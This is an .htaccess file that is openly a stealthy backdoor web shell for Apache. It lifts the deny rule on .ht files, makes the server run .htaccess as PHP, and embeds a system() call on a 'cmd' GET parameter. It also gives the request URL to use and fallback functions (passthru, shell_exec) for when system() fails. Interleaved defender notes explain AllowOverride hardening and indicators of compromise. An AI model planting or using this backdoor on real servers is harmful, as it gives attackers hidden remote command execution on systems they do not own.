# htaccess backdoor shell
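# this is relatively stealthy compared to a typical webshell: no extra .php file
# appears, so scans for unexpected script files miss it -- watch .htaccess contents instead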
# overriding deny rule
# making htaccess accessible from the internet
# without this you'll get an HTTP 403
#
# Stock Apache configurations normally ship a server-level rule that denies
# requests for .ht* files; the section below re-grants access from inside the
# per-directory file for any file name matching the regex ^\.ht.
# It carries both access-control syntaxes: "Require" (Apache 2.4,
# mod_authz_core) and "Order"/"Allow" (Apache 2.2, or 2.4 with
# mod_access_compat) -- presumably so the file works on either version.
#
# Defender notes: these directives are honoured only where AllowOverride
# permits them in .htaccess (AuthConfig for Require, Limit for Order/Allow),
# so "AllowOverride None" on directories a web application can write to
# neutralises this section. A .htaccess that grants access to ^\.ht, or an
# HTTP 200 logged for a request to /.htaccess, is a strong indicator of
# compromise.
<Files ~ "^\.ht">
Require all granted
Order allow,deny
Allow from all
</Files>
# Make the server treat .htaccess file as .php file
#
# AddType maps the ".htaccess" extension to the PHP media type, so a server
# that dispatches on that type hands the file to the PHP interpreter
# (whether it does depends on how PHP is wired into the server -- verify
# per host).
#
# Defender notes: AddType only works from .htaccess when AllowOverride
# includes FileInfo. Any AddType/AddHandler/SetHandler line pointing at PHP
# inside a content directory's .htaccess deserves an alert from
# file-integrity monitoring.
AddType application/x-httpd-php .htaccess
# <?php system($_GET['cmd']); ?>
# To execute commands you would navigate to:
# http://vulnerable.com/.htaccess?cmd=YourCommand
# If system(); isn't working then try other command-execution functions
# e.g. passthru(); shell_exec(); etc
# If you still can't execute commands, try bypassing php.ini via htaccess